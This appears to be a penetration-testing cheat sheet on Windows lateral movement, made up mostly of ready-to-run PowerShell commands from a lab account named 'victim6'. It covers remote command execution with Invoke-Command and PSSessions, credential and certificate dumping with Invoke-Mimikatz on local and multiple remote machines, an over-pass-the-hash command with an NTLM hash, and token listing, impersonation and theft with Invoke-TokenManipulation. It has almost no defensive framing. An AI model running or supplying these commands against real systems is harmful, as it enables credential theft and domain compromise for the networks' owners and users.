Lateral Movement Protocols And Tools

One-to-one:

  • PSSession
  • Interactive
  • Runs in a new process (wsmprovhost)
  • Is stateful
  • Useful cmdlets
  • Nw-PSSession
  • Enter-PSSession

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> New-PSSession -ComputerName  WIN-2RUMVG5JPOC

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> $sess = New-PSSession -ComputerName WIN-2RUMVG5JPOC

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> Enter-PSSession -Session $sess [WIN-2RUMVG5JPOC]: PS C:\Users\Administrator\Documents> hostname

One-to-many:

  • Also known as fan-out remoting.
  • Non-interactive.
  • Executes commands parallel.
  • Useful cmdlets.

Invoke-command:

  • Invoke-command
  • Run commands & scripts on
  • Multiple remote computers
  • In disconnected sessions(v3)
  • As background job & more

Use credentials parameter to pass username /password :

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> Invoke-Command -ScriptBlock{whoami;hostname} -ComputerName WIN-2RUMVG5JPOC

PS C:\Users\victim6\Downloads> Invoke-Command -FilePath .\Invoke-Encode.ps1 -ComputerName WIN-2RUMVG5JPOC

PS C:\Users\victim6\Downloads> Invoke-Command -ScriptBlock{$who=whoami} -ComputerName WIN-2RUMVG5JPOC

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Command -ScriptBlock{$who} -ComputerName WIN-2RUMVG5JPOC

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Command -scriptblock {Invoke-Mimikatz} -ComputerName WIN-2RUMVG5JPOC

Use below to execute commands or semicolon separated scripts:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Command -ScriptBlock {get-process} -ComputerName WIN-2RUMVG5JPOC

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Command -ScriptBlock {get-process} -ComputerName (Get-Content .\test.txt)

Use below to execute scriots from files:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> $sess = New-PSSession -ComputerName WIN-2RUMVG5JPOC

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Command -ScriptBlock {$who=whoami} -Session $sess

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Command -ScriptBlock {$who} -Session $sess

Invoke-mimikatz:

Dump credentials on a local machine:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz –DumpCreds

Dump certs on a local machine:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz –DumpCerts

“Over-pass-the-hash” generate tokens from hashes:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”sekurlsa::pth /user:Administrator /domain:security.local /ntlm:638edc584b4d0a93fe3701b66d2f525b /run:powershell.exe”‘

Dump credentials on multiple remote machines:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -DumpCreds -ComputerName @(“sys1″,”sys2”)

Token manipulation:

List all the tokens on a machine:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Import-Module .\Invoke-TokenManipulation.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-TokenManipulation –ShowAll

List all unique usable tokens on the machine:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-TokenManipulation -Enumerate

Start a new process with token of a specific user:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-TokenManipulation -ImpersonateUser -Username “domain user”

Start new process with token of another process:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-TokenManipulation -CreateProcess “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -ProcessId 500

@Saksham Dixit